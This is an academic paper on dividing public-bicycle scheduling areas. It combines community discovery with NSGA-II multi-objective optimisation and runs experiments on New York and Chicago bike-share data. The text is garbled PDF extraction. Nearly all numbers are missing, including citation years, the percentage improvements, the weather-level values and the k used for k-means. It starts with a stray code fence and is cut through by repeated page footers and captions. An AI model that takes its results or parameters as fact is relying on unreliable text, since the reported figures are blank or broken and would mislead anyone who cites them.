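# usage: sm = similarity_matrix(trips_df, m_days=31)      # e.g. one full month
```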
if the division result dr conforms to the lease/return law, abbreviated lrl, users actively complete a part of the scheduling work, which reduces the scheduling workload. however, in the actual scheduling area division, in order to obtain the highest comprehensive benefit, the division should not only conform to this law but also balance the scheduling workload between areas as far as possible (shpak et al., ). the regional scheduling workload is mainly determined by the dispatch distance within the area and by the number of stations in the area; if the regional workload is balanced, the two variances $z_1$ and $z_2$ defined below should both be as small as possible.

this balance problem can therefore be transformed into a multi-objective optimization problem with objective function

$$\mathrm{DR}=\{R_1,R_2,\ldots,R_n\}\ \xrightarrow{\ \mathrm{MOO}\ }\ \min F=[z_1,z_2]^{T}$$

where $z_1$ is the variance of the dispatch distances, $z_2$ is the variance of the numbers of sites, and moo denotes multi-objective optimization. in the definition of $z_1$, $n$ is the number of areas, $d_i$ the estimated dispatch distance of area $i$, and $\bar{d}$ the average of the estimated dispatch distances:

$$z_1=\frac{1}{n-1}\sum_{i=1}^{n}\big(d_i-\bar{d}\big)^{2}$$

in the definition of $z_2$, $n_i$ is the number of internal sites of area $i$ and $\bar{n}$ the average number of internal sites:

$$z_2=\frac{1}{n-1}\sum_{i=1}^{n}\big(n_i-\bar{n}\big)^{2}$$

subject to

$$S=\big[(S_i-P)\cup(S_j-P)\big]\cup P$$

which indicates that every site must be divided into some area, where $S_i$ and $S_j$ denote partition sets and $P$ denotes the collection of parking-lot sites;

$$\big[(S_i-P)\cap(S_j-P)\big]=\varnothing\quad(i\neq j)$$

which indicates that a site can only be divided into one area; and

$$S_i\cap P\neq\varnothing,\qquad S_j\cap P\neq\varnothing$$

which indicates that each scheduling area contains at least one dispatch center. there are two optimization goals for this problem (a short sketch of these two objective functions is given below):
• minimize the variance of the estimated dispatch distances between the areas;
• minimize the variance of the numbers of sites in the areas.

model assumptions and parameter description
the scheduling area dividing process is complicated, and the abstract model involves many parameters. in order to make the model as close as possible to the actual division, the following assumptions about the dividing process are made before the model is established:
• the scheduling distance of each area can be estimated theoretically, and the estimated scheduling distance is approximately equal to the actual scheduling distance;
• dispatching vehicles are not limited by driving time or mileage;
• only one dispatching vehicle in each area is responsible for bicycle dispatch;
• the model of the dispatching vehicle is the same for all areas, with identical parameters;
• the dispatching vehicle departs from the dispatching center, completes the dispatching task, and then returns to the original dispatching center, without vehicle failure or other unexpected factors.
based on the problem description and the model assumptions, the parameters and variables of the model are defined in the table below.

leasing demand forecasting model
after the scheduling area is divided, the demand of each lease/return site must be known in order to calculate the estimated total scheduling distance, so the future scheduling demand of each lease/return site needs to be predicted. each day is divided into time periods of equal length, indexed by t. a meteorology-similarity weighted k-nearest-neighbour (mswk) method is introduced to predict the number of leased and returned bicycles at each site.
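as a small illustration of the two objective functions defined above, the following sketch (plain numpy; the per-area distances and site counts are assumed to be given by earlier steps) scores one candidate division.

```python
# Short sketch of the two objectives: z1 is the variance of the estimated
# dispatch distances across areas, z2 the variance of the per-area site
# counts; both are to be minimised.
import numpy as np

def objectives(area_distances, area_site_counts):
    d = np.asarray(area_distances, dtype=float)    # d_i for each area
    n = np.asarray(area_site_counts, dtype=float)  # n_i for each area
    z1 = d.var(ddof=1)   # 1/(n-1) * sum (d_i - mean)^2, as in the model
    z2 = n.var(ddof=1)
    return z1, z2
```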
table: parameters and variables of the model. based on the problem description and model assumptions, the parameters and variables of the model are defined as follows.

parameter/variable | meaning
n | the number of areas
i, j | area indices
di | the estimated scheduling distance of area i
dj | the estimated scheduling distance of area j
d̄ | the average of the estimated dispatch distances over all areas
ni | the number of sites in area i
nj | the number of sites in area j
n̄ | the average number of sites within an area
s | the collection of all sites
si | the site division set of area i
sj | the site division set of area j
p | the collection of parking lot (dispatch center) sites

table: exact values assigned to the weather levels. in the measurement of the similarity of weather, the weather is split into five levels and assigned corresponding values:

weather | value
heavy snow, heavy rain |
snow, light snow, moderate rain, light rain |
foggy |
sunny and cloudy |

leasing number forecast model
mswk is an improved method for predicting the lease/return bicycle quantity based on the knn algorithm: it analyses the amount of leasing in similar time periods to predict future leasing, measuring similarity over five indicators: weather, temperature, humidity, wind speed, and visibility. in the measurement of weather similarity, the weather is split into five levels and assigned the values in the table above. let the quantified weather conditions in time period t of days p and q be denoted by $W_{d_p^t}$ and $W_{d_q^t}$, respectively. the weather similarity for period t between days p and q is defined as

$$\lambda_1=\frac{1}{\sqrt{2\pi}\,\sigma_1}\,\exp\!\left(-\frac{\big(W_{d_p^t}-W_{d_q^t}\big)^2}{2\sigma_1^2}\right)$$

the temperatures in period t of days p and q are denoted by $F_{d_p^t}$ and $F_{d_q^t}$, and the temperature similarity for period t is defined as

$$\lambda_2=\frac{1}{\sqrt{2\pi}\,\sigma_2}\,\exp\!\left(-\frac{\big(F_{d_p^t}-F_{d_q^t}\big)^2}{2\sigma_2^2}\right)$$

the three dimensions of humidity, wind speed, and visibility are represented by a 3-d gaussian kernel function, where $H_{d_p^t}$, $S_{d_p^t}$, $V_{d_p^t}$ denote the humidity, wind speed, and visibility of period t on day p, respectively. the humidity, wind speed, and visibility similarity between days p and q in period t is defined as

$$\lambda_3=\frac{1}{(2\pi)^{3/2}\,\sigma_3\sigma_4\sigma_5}\,\exp\!\left(-\left(\frac{\big(H_{d_p^t}-H_{d_q^t}\big)^2}{2\sigma_3^2}+\frac{\big(S_{d_p^t}-S_{d_q^t}\big)^2}{2\sigma_4^2}+\frac{\big(V_{d_p^t}-V_{d_q^t}\big)^2}{2\sigma_5^2}\right)\right)$$

to simplify the calculation, the temperature, humidity, wind speed, and visibility are normalized and all of $\sigma_1,\sigma_2,\sigma_3,\sigma_4,\sigma_5$ are set to 1. finally, by weighting the above three similarity indexes, the overall similarity between days p and q at time period t is obtained:

$$M\!\left(d_p^{t},d_q^{t};a\right)=\delta_w\!\left(d_p^{t},d_q^{t}\right)\sum_{i=1}^{3}a_i\,\lambda_i$$

where $\delta_w\!\left(d_p^{t},d_q^{t}\right)$ is a judgment function that equals 1 when p and q are both working days or both non-working days, and takes a smaller value otherwise. to predict the rental amount in period t of day q, the k most similar days are selected and the mswk prediction is computed as

$$SI\!\cdot\!PD\!\left(d_q^{t};a\right)=\frac{\sum_{p=1}^{k} M\!\left(d_p^{t},d_q^{t};a\right)\;SI\!\cdot\!PD\!\left(d_p^{t}\right)}{\sum_{p=1}^{k} M\!\left(d_p^{t},d_q^{t};a\right)}$$

a short illustrative sketch of this similarity-weighted prediction is given below.
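the similarity kernels and the weighted knn prediction above can be sketched as follows. the dictionary field names, the weights a_i, the choice of k, and setting the judgment function to zero for mixed day types are illustrative assumptions, not values taken from the paper.

```python
# Illustrative sketch of the MSWK similarity and prediction described above
# (all sigmas set to 1 after normalisation, as stated in the text).
import math

def gauss(x_p, x_q, sigma=1.0):
    """1-D Gaussian kernel used for the weather and temperature indicators."""
    return math.exp(-((x_p - x_q) ** 2) / (2 * sigma ** 2)) / (math.sqrt(2 * math.pi) * sigma)

def day_similarity(day_p, day_q, a=(1 / 3, 1 / 3, 1 / 3)):
    """M(d_p^t, d_q^t; a): weighted combination of the three kernels."""
    same_type = day_p["working"] == day_q["working"]
    delta_w = 1.0 if same_type else 0.0            # judgment function (assumed 0 for mixed day types)
    lam1 = gauss(day_p["weather"], day_q["weather"])
    lam2 = gauss(day_p["temperature"], day_q["temperature"])
    # product of three 1-D kernels, equivalent to the 3-D kernel with unit sigmas
    lam3 = (gauss(day_p["humidity"], day_q["humidity"]) *
            gauss(day_p["wind"], day_q["wind"]) *
            gauss(day_p["visibility"], day_q["visibility"]))
    return delta_w * (a[0] * lam1 + a[1] * lam2 + a[2] * lam3)

def mswk_predict(history, query_day, k=5):
    """Similarity-weighted mean of the rentals on the k most similar days."""
    sims = [(day_similarity(d, query_day), d["rentals"]) for d in history]
    top = sorted(sims, key=lambda t: t[0], reverse=True)[:k]
    total = sum(s for s, _ in top) or 1.0
    return sum(s * r for s, r in top) / total
```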
returning number forecast model
after a user rents a bicycle, they often return it to an adjacent site within a certain period of time. therefore, prediction data based on neighbouring sites are needed to predict the number of bicycles returned to a site. bicycles rented from site i during period t may be returned to a site j adjacent to i during period t or period t+1.

to forecast the number of returned bicycles for lease period t, it is first necessary to estimate the number of bicycles rented from site i that end up at site j within period t:

$$E_{ij}^{t}=SI\!\cdot\!PD(t)\cdot\frac{E_{ij}\!\cdot\!F}{SI\!\cdot\!PD}$$

where SI·PD(t) is the predicted rental quantity at site i in period t, E_ij·F is the historical count of bicycles rented at site i and returned at site j, and SI·PD is the historical total rental count at site i. analysis of the historical data shows that users' riding times can be fitted by a two-component gaussian function, so the riding time d_ij(t) between rental sites i and j can be estimated as

$$d_{ij}(t)=g_1(t;\mu_1,\sigma_1)+g_2(t;\mu_2,\sigma_2).$$

assume that users' return times are evenly distributed and that the leased bicycle is returned within period t or period t+1. for a user who rents a bicycle from site i at moment t' within period t, the probabilities of returning it at site j within period t and within period t+1 are

$$P_{ij}^{t}=\frac{1}{|T|}\int_{0}^{|T|}\int_{0}^{|T|-t'} d_{ij}(t)\,\mathrm{d}t\,\mathrm{d}t'$$

$$P_{ij}^{t+1}=\frac{1}{|T|}\int_{0}^{|T|}\int_{|T|-t'}^{+\infty} d_{ij}(t)\,\mathrm{d}t\,\mathrm{d}t'.$$

finally, considering the traffic patterns of the adjacent sites and the corresponding probabilities, the predicted number of returned bicycles at the site in period t is

$$SI\!\cdot\!DD(t)=\sum_{j\neq i}\Big(E_{ij}^{t}\,P_{ij}^{t}+E_{ij}^{t-1}\,P_{ij}^{t+1}\Big).$$

combining the predicted rental and return demand of site i in the future period t gives the net demand of site i:

$$n=SI\!\cdot\!DD(t)-SI\!\cdot\!PD(t).$$

if n is less than zero, site i will not be able to meet users' rental demand in period t, and bicycles need to be brought in by dispatching (feng, zhu & liu, ). if n is greater than the number of parking spots at the site, site i will not be able to satisfy users' return demand in period t, and the number of bicycles needs to be reduced by scheduling. a small sketch of this net-demand check is given below.
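a minimal sketch of the net-demand check just described, where dock_capacity stands for the number of parking spots at the site (the function names are illustrative):

```python
# Net-demand check: n = SI.DD(t) - SI.PD(t) for one site and one future period.
def net_demand(predicted_returns: float, predicted_rentals: float) -> float:
    return predicted_returns - predicted_rentals

def dispatch_action(n: float, dock_capacity: int) -> str:
    if n < 0:
        return "move bicycles in"      # rental demand cannot be met
    if n > dock_capacity:
        return "move bicycles out"     # return demand cannot be met
    return "no dispatch needed"
```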
community discovery algorithm based on multi-objective optimization
the community discovery algorithm based on multi-objective optimization combines a quantitative indicator of the regional scheduling workload, a community discovery algorithm (shivach, nautiyal & ram, ), and a multi-objective optimization algorithm (mori & saito, ). firstly, the fast unfolding community discovery algorithm (sun et al., ) is performed on the similarity matrix of the sites. secondly, the workload index is used to adjust the results of the community discovery algorithm. throughout the process, the results are continuously optimized by the multi-objective optimization algorithm.

cdomo scheduling workload analysis
the scheduling workload is an indicator that measures the workload of a dispatch line. scheduling itself spans many fields, so there is no uniform standard (kim, jeong & lee, ). the generalized scheduling workload is mainly determined by the scheduling distance, the delivery volume, and the number of service outlets; weighting and integrating these three parameters quantifies the workload of a dispatching line.

suppose w is the generalized scheduling workload, d is the driving distance (km), n is the number of service outlets (pieces), s is the delivery amount (pieces), and ρ1, ρ2, ρ3 are the weights of the driving distance, the number of service outlets, and the delivery amount, respectively:

$$w=\rho_1\cdot d+\rho_2\cdot n+\rho_3\cdot s$$

this paper combines the generalized scheduling workload with public bicycles and obtains a quantitative formula for the regional scheduling workload, where w_i is the scheduling workload of area i, d_i is the scheduling distance of area i (calculated by the maximum generation star algorithm), n_i is the number of stations in area i, s_i is the dispatch amount of area i, and ρ1, ρ2, ρ3 are the corresponding weight coefficients:

$$w_i=\rho_1\cdot d_i+\rho_2\cdot n_i+\rho_3\cdot s_i$$

since regional scheduling is based on all stations in the entire area, and at the division stage the sites waiting for scheduling and the scheduling quantities of each area are unknown, this paper ignores the impact of s_i on the scheduling workload, that is, ρ3 = 0, so the formula simplifies to

$$w_i=\rho_1\cdot d_i+\rho_2\cdot n_i.$$

in this quantitative formula the weight coefficients cannot be determined manually; but when the scheduling workload is balanced, the variance of the estimated scheduling distances of the areas and the variance of the numbers of stations in the areas should both be as small as possible, so the scheduling balance problem can again be turned into a multi-objective optimization problem with objective function min F = [z1, z2]^T.

nsga-ii is the most popular multi-objective genetic algorithm. it first applies genetic operators to the parent population p to obtain an offspring population q; the two populations are then merged, ranked by non-inferior (non-dominated) sorting and crowding-distance sorting, and a new population is selected. this process is repeated until the termination condition is met. the detailed procedure is as follows:
(1) randomly generate the initial population p0, sort it non-inferiorly, and assign a non-domination rank to each individual; then perform selection, crossover, and mutation on p0 to obtain a new population q0, and set i = 0.
(2) combine the parent and offspring populations into a new population r_i = p_i ∪ q_i, and sort r_i non-inferiorly to obtain the non-inferior layers f1, f2, ...; the next parent population p_{i+1} is filled from these layers in order, using crowding-distance sorting within the last layer that cannot be admitted completely.
(3) perform selection, crossover, and mutation operators on population p_{i+1} to form population q_{i+1}.
(4) if the termination condition holds, stop; otherwise set i = i + 1 and go to step (2).
the main process of the nsga-ii algorithm is shown in the figure below.
figure: the main process of the nsga-ii algorithm.
this paper uses the nsga-ii multi-objective optimization algorithm to solve the scheduling area partition model (wu, ). the length of the chromosome is two (basch et al., ), corresponding to the two weight parameters of the area scheduling workload, so each individual corresponds to one scheduling workload formula, and the division produced by the community discovery step is adjusted according to that workload. the figure shows the specific flow of the nsga-ii algorithm; a short sketch of how one individual is evaluated is given below.
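the following sketch illustrates how the genes of one nsga-ii individual could be turned into the two objective values; adjust_division and estimated_distance are stand-ins for steps the paper defines elsewhere (the community-adjustment step and the per-area distance estimation), not a fixed api.

```python
# Sketch of evaluating one NSGA-II individual: the two genes are the workload
# weights (rho1, rho2); the division is adjusted under the induced workload
# w_i = rho1*d_i + rho2*n_i and then scored by the two variance objectives.
import numpy as np

def evaluate_individual(genes, base_division, adjust_division, estimated_distance):
    rho1, rho2 = genes
    division = adjust_division(base_division, rho1, rho2)   # workload-guided adjustment
    d = np.array([estimated_distance(area) for area in division], dtype=float)
    n = np.array([len(area) for area in division], dtype=float)
    return d.var(ddof=1), n.var(ddof=1)    # (z1, z2), both minimised by NSGA-II
```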
cdomo algorithm design community discovery algorithm built on multi-objective integrates quantitative indicators of regional scheduling workloads, community discovery algorithms and multi-objective optimization algorithms. firstly, the fast unfolding community discovery algorithm is implemented based on the similarity matrix of the least sites; secondly, the workload index is used to adjust the results of the community discovery algorithm. the entire process continuously optimizes the results from a multi-objective optimization algorithm. table displays the detailed algorithm calculation. experiment and analysis the rest of the paper is part of the experiment and analysis. the experimental section was divided into two groups, which were experiments using new york public bicycle data and chicago public bicycle data. in the analysis section, the two groups of experiments use k-means clustering algorithm, and fast unfolding community discovery algorithm as comparisons, it compares the three aspects of the number of rental sites, the variance of the number of scheduled bicycles, and the estimated total distance of scheduling. the comparative data show that the algorithm is effective against both sets of experiments. lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure specific flow of nsga algorithm. full-size doi: . /peerjcs. /fig- new york public bicycle data set introduction citi bikes (jiang et al., ) is a people-benefit project launched by the new york city government. figure displays the spatial distribution of rental sites. blue represents manhattan, with rental sites; green represents brooklyn, with sites. each citi bicycle rental site has gps location information, so it is not difficult to locate the rental site. the system records the user’s data onto each cycle. the package contains the location and time data onto the start and the end of the site, the entire riding process, the bicycle id, and the user’s gender and birth date. this experiment will use the may rent-return dataset of new york public bicycles to conduct an experiment, a total of , and rent-return data. the dataset contains fields, and the nine fields related to this experiment are shown in table . this paper uses the pre-processing program to process the leased data, it turned into the lease-return relationship between the least sites (guo et al., ). it also generates a similarity matrix based on the rent-return relationship. the similarity calculation formula lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table detailed algorithm calculation. algorithm: community discovery algorithm based on multi-objective optimization input: site similarity matrix x, population number popsize, maximum number of iterations maxgen. output: optimal regional division results ρ∗ , and workload index parameters ρ ∗ . . initialize the historical optimal solution f ∗ and its workload index parameter ρ∗ ,ρ ∗ . . perform a pass phrase of the fast unfolding community discovery algorithm, and obtain the results of the preliminary zoning division as r. . calculate the estimated distance di of each area in r, number of regional sites ni. . individual genes in the population as weight coefficients ρ ,ρ . finally, the scheduling workload of each area is calculated by the formula wi =ρ ·di+ρ ·ni. the variance of the regional workload is denoted as v. . 
for each rental site i, try to put i into other communities and calculate the incremental v of the adjustment workload, the entire process records the maximum vmax and the corresponding community k. if vmax < , site node i does not adjust; if vmax > , node i is adjusted to community k. traverse all the site until all the site are adjusted and the result is recorded as r∗. . define the variance function f of the regional site, and define the regional dispatch distance variance function f , they are two objective functions to perform fast non-dominated sorting on the results, the records of the optimal solution in the contemporary population as f ′ , and its corresponding scheduling workload parameters are denoted as ρ ′ ,ρ ′ . if f ′ > f ∗ after comparison, letting ρ∗ =ρ ′ ,ρ ∗ =ρ ′ . . determine whether the number of program iterations exceeds the maximum number of iterations maxgen. if it exceeds, the optimal regional division results, and workload in- dex parameters ρ∗ ,ρ ∗ are output; otherwise, a new population is generated through elite strategy selection, which can ensure that certain elite individuals will not be discarded during the evolution process, thereby improving the accuracy of the optimization re- sults, and expanding the sampling space. and gene crossover and mutation processes and the execution continue from . for the least sites is as follows (eq. ( . )): rij = qij+qji m ( . ) among them, rij represents the similarity between site i and site j; qij represents the number of times to rent a bicycle from site i and site j to return the bicycle; qji represents the number of times of renting a bicycle from site i and returning it at site j; m represents the time range in days. in this experiment, the data set was a total of days in may , so m = .the corresponding abstract network can be generated through the lease-return relationship (fig. ). due to the dense population, dense sites, and prosperous business, the sites in manhattan are more closely linked, and brooklyn is a river is separated from manhattan, so the connection between the two regional sites is sparse except for the leases along the river. experimental result in the experiment, we first used the gephi visualization network analysis platform to analyse the community structure in the data (hu, an & wang, ). the gephi platform uses the integrated fast unfolding algorithm, it divides the public bicycle abstraction network according to the rules of public bicycle rental. the fast unfolding algorithm mainly lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure spatial distribution map of public bicycles in new york. full-size doi: . /peerjcs. /fig- includes two phases. the first phase is known as modularity optimization. the main part is to divide each node into the community, its neighbourhood nodes are located, so that the value of the module degree becomes larger; the second phase is called community. aggregation is mainly to aggregate the communities divided in the first step into one site, that is, to rebuild the network based on the community structure generated in the previous step. repeat the above process, until the structure of the network no longer changes (fig. ). after the fast unfolding algorithm for the new york public bicycle rental site in this paper, fig. 
shows the internal community structure of the abstract network of new york’s public bicycles, where the dots represent sites, where the sites of different communities are represented by different colours, and the lines represent the relationships between the sites; obviously, six communities have more close contact with leases within the same community, and the links between different societies are relatively sparse. the results of the lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table dataset contains fields, and the nine fields. no. fields meaning start time starting time stop time end time start_station_id bicycle rental site id start_station_name name of bicycle rental site start_station_longitude longitude of rental bicycle rental site start_station_latitude latitude of rental bicycle rental end_station_id return bicycle rental id end_station_name the name of the bicycle rental site end_station_longitude the longitude of the bicycle rental site end_station_latitude the longitude of the bicycle rental site fast unfolding community discovery algorithm are mapped to map on new york (fig. ). manhattan is a densely populated administrative district, and the vast majority of public bicycles in the area ride on the inside, so the manhattan district is divided into five areas according to the law of rent. brooklyn is structured in a district. although the division results are relatively reasonable, there are still many abnormal sites. these abnormal sites are far away from their respective areas; the number of sites of each area is uniform. cdomo is based on community discovery algorithm, considering the regional scheduling workload factors. the regional scheduling workload is determined by estimated dispatch distance and the number of regional least sites. if the community finds out that there are abnormal sites, it will cause regional forecasting scheduling distance become larger, so that the variance between the scheduling distances will become larger. if there is a major difference in the number of sites between areas, the variance between the numbers of sites will increase. the goal of cdomo is to optimize the variance of the distance between the regional scheduling, and optimize the variance of the number of sites. in the optimization process, the division results can be adjusted to make it more reasonable. the division process does not take into consideration the deficiencies in the workload balance in each scheduling area. after the community discovery algorithm based on multi-objective optimization solves the division model of the public bicycle scheduling area, the experimental results shown in fig. are obtained. by comparing the result shows that the sites along the williamsburg bridge and the riverside along manhattan is divided into the same dispatch area, which is more n line with the rules of public bicycle rental and resolving the anomaly (zhang et al., ). the difference between the number of sites and regional sites is too large (manju & fred, ). in order to maintain the consistency of the experiment, the value of k in the classical clustering algorithm k-means algorithm is set to (lin & song, ), and then the clustering is based on the same data set; the space area enclosed by the sites in each class as the scheduling area. in order to achieve regional division, the results of the regional division based on the clustering algorithm (fig. ). 
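the k-means baseline just described can be sketched as follows; scikit-learn is assumed to be available, and clustering sites by their coordinates is an assumption made here for illustration, since the exact features used by the baseline are not restated at this point.

```python
# Sketch of the k-means comparison baseline: cluster rental sites by
# (longitude, latitude), with k chosen to match the number of communities
# found by fast unfolding, and treat each cluster as one scheduling area.
import numpy as np
from sklearn.cluster import KMeans

def kmeans_division(site_coords: np.ndarray, k: int) -> np.ndarray:
    """site_coords: (num_sites, 2) array of (longitude, latitude)."""
    labels = KMeans(n_clusters=k, n_init=10, random_state=0).fit_predict(site_coords)
    return labels  # labels[i] is the scheduling area assigned to site i
```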
it was found that when the clustering number is k= , the clustering algorithm achieves a poor regional division. the number of sites in the class represented by the red is very large, while the number of classes represented by purple lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure abstract network of public bicycles in new york city. full-size doi: . /peerjcs. /fig- and beige is very small, and the number of sites to vary greatly from the types. in addition, the boundaries of each scheduling area are unclear and are overlapped (zhen et al., ). algorithm performance comparison results built on the overall experimental results of the above three methods, it is found that the multi-objective optimization-based community discovery algorithm proposed to this lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure schematic diagram of community discovery algorithm. full-size doi: . /peerjcs. /fig- figure schematic diagram of analysis results of the gephi visual network analysis platform. full-size doi: . /peerjcs. /fig- paper can make the division of the areas consistent with the rules and make the regional scheduling workload as balanced as possible. in addition to the analysis of the overall distribution of provincial division space, the paper also compares and analyses the three lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results of fast unfolding community discovery algorithm in the new york dataset. full-size doi: . /peerjcs. /fig- dimensions of the regional rental site variance, the regional dispatch distance variance, and the estimated total dispatch distance. figure compares the variance between the numbers of sites. the data show that the variance between the cdomo compared to the k-means algorithm is reduced by . %, and the variance of the fast unfolding algorithm is reduced by . %. figure compares the variance of the number of bicycles dispatched in the area. the data show that the variance of the cdomo algorithm compared to the k-means algorithm is reduced by . %, and the variance of the fast unfolding algorithm lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results of region partition based on multi-objective optimization algorithm in the new york dataset. full-size doi: . /peerjcs. /fig- lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results of region partition based on clustering algorithm in the new york dataset. full-size doi: . /peerjcs. /fig- is reduced by . %. figure compares the estimated total scheduled distances. the data show that the variance of the cdomo algorithm is . % compared with the k-means algorithm and . % compared to the fast unfolding algorithm. when scheduling and partitioning based on multi-objective optimization algorithm, the estimated scheduling distance can be shortened, and the estimated scheduling distance is positively related to the actual scheduling distance, so the actual scheduling distance will also be shortened; in addition, the scheduling work of each area will also be made. relatively balanced. figure is a comparative display of experimental results. 
lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure difference in the number of bicycle rental points under three algorithms in the new york dataset. full-size doi: . /peerjcs. /fig- figure distance difference of bicycle scheduling area under three algorithms in the new york dataset. full-size doi: . /peerjcs. /fig- chicago public bicycle data set introduction first of all, the data set cited in this paper is from chicago public bicycle data (ye, chu & xu, ). the starting site is - - , and the deadline is - - . there are two quarters and six months of data, a total of , data records. this paper did some data pre-processing: trips that did not include a start or end date were removed from the original table. then, in order to ensure that the information of the data set more abundant, this paper decided to use the data set, distance information of each pair of source address and destination address. finally, we utilize certain data pre-processing methods to remove weather and other data because it can be considered as an ideal condition. the dataset lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure total distance of estimated scheduling under three algorithms in the new york dataset. full-size doi: . /peerjcs. /fig- figure comparison of experimental results of region partition under three algorithms in new york dataset. full-size doi: . /peerjcs. /fig- contains fields, and the fields related to this experiment are presented in the following table . experimental result results of the fast unfolding community discovery algorithm can be mapped to chicago map as the picture shows (ye, chu & xu, ). in contrast, the division results are more uniform and reasonable, but there are too many abnormal sites in the middle. these abnormal sites are a long way from where they should have existed. the number of rental sites in a divided area is not particularly uniform (fig. ). based on cdomo, in the optimization process, the division results are dynamically adjusted in time. therefore, in this case, the division result is more reasonable, and the problem of scheduling balance, this algorithm obviously adds more consideration. it not only addresses the problem of abnormal sites, but also solves the problem of differences in the number of regional sites at the same time (fig. ). in order to make the experiment lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table dataset contains fields, and the fields. no. fields meaning start time day and time trip started, in cst stop time day and time trip ended, in cst from_station_id id of station where trip originated from_station_name name of station where trip originated from_station_longitude longitude of rental bicycle rental site from_station_latitude latitude of rental bicycle rental to_station_id id of station where trip terminated to_station_name name of station where trip terminated to_station_longitude the longitude of the bicycle rental site to_station_latitude the longitude of the bicycle rental site figure results of fast unfolding community discovery algorithm in chicago dataset. full-size doi: . /peerjcs. /fig- lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . 
/peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results of region partition based on multi-objective optimization algorithm in the chicago dataset. full-size doi: . /peerjcs. /fig- consistent, we set the value of k in the k-means algorithm as , and then we clustered the uniform data set. the results of the clustering are presented in the figure. this paper believes that the results obtained by the clustering algorithm are very poor, because the red sites represent a particularly large number of sites. the yellow site represents a particularly small number of rental sites. this shows that the various types of leases, the number of differences is too large, in addition, this algorithm also led to the border is not clear, and there is some inevitable overlap. in the actual scheduling work, this situation is not allowed, as showed in fig. . algorithm performance comparison results this paper will describe the quantified experimental results of the three methods, it compares the differences between them. it is easy to see that the algorithm proposed in lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results of region partition based on clustering algorithm in the chicago dataset. full-size doi: . /peerjcs. /fig- this paper is optimal, compared to the other two algorithms. figure compares the difference between the numbers of sites. compared to the k-means clustering algorithm and the fast unfolding community discovery algorithm, the variance of the cdomo algorithm is reduced by . % and . %. figure in this paper compares the number of scheduled bicycles, it finds that the cdomo algorithm set out in the present paper is an optimal algorithm. similarly, opposed to the k-means clustering algorithm and the fast unfolding community finding algorithm, the variance is reduced by . % and . % (fig. ). figure compares the estimated total distance of scheduling with the other two algorithms, and the conclusion shows that the distance is decreased by . % and . %. then we can conclude that the cdomo algorithm proposed in this paper: it effectively reduces the number of sites; it effectively reduced the variance in the number of bicycles dispatched; it effectively reduced the estimated total distance for scheduling. lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure difference in the number of bicycle rental points under three algorithms in the chicago dataset. full-size doi: . /peerjcs. /fig- figure distance difference of bicycle scheduling area under three algorithms in the chicago dataset. full-size doi: . /peerjcs. /fig- conclusion in order to solve the problem of regional division of public bicycles, this paper proposes cdomo. the algorithm fully considers the special law of public bicycle lease/return, and in order to balance the scheduling workload between areas, the regional scheduling workload index is proposed. this problem is identified as a multi-objective optimization problem with two objective functions: minimize the variance between the estimated dispatch distances between each area; minimize the variance between the numbers of sites in each area. the regional scheduling workload can adjust the results of the community discovery algorithm in real time and dynamically. 
in the end, the results obtained can meet the special rules of public bicycle lease/return, and balance the workload between the areas. the experimental results show that the cdomo can effectively shorten the scheduling lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure total distance of estimated scheduling under three algorithms in the chicago dataset. full-size doi: . /peerjcs. /fig- figure comparison of experimental results of region partition under three algorithms in the chicago dataset. full-size doi: . /peerjcs. /fig- distance of public bicycle system, effectively improve the scheduling efficiency, and make the workload of each scheduling area relatively balanced. the next step is to have a more appropriate solution if you limit the travel time and mileage of the scheduling vehicle. acknowledgements the authors are grateful to the anonymous referee for a careful checking of the details and for helpful comments that improved this paper. lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. additional information and declarations funding funding for this work was financially supported by the national natural science foundation of china (no. ) and the key research and development program of zhejiang province, china (grant no. c ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: national natural science foundation of china: . key research and development program of zhejiang province, china: c . competing interests the authors declare there are no competing interests. author contributions • fei lin conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation 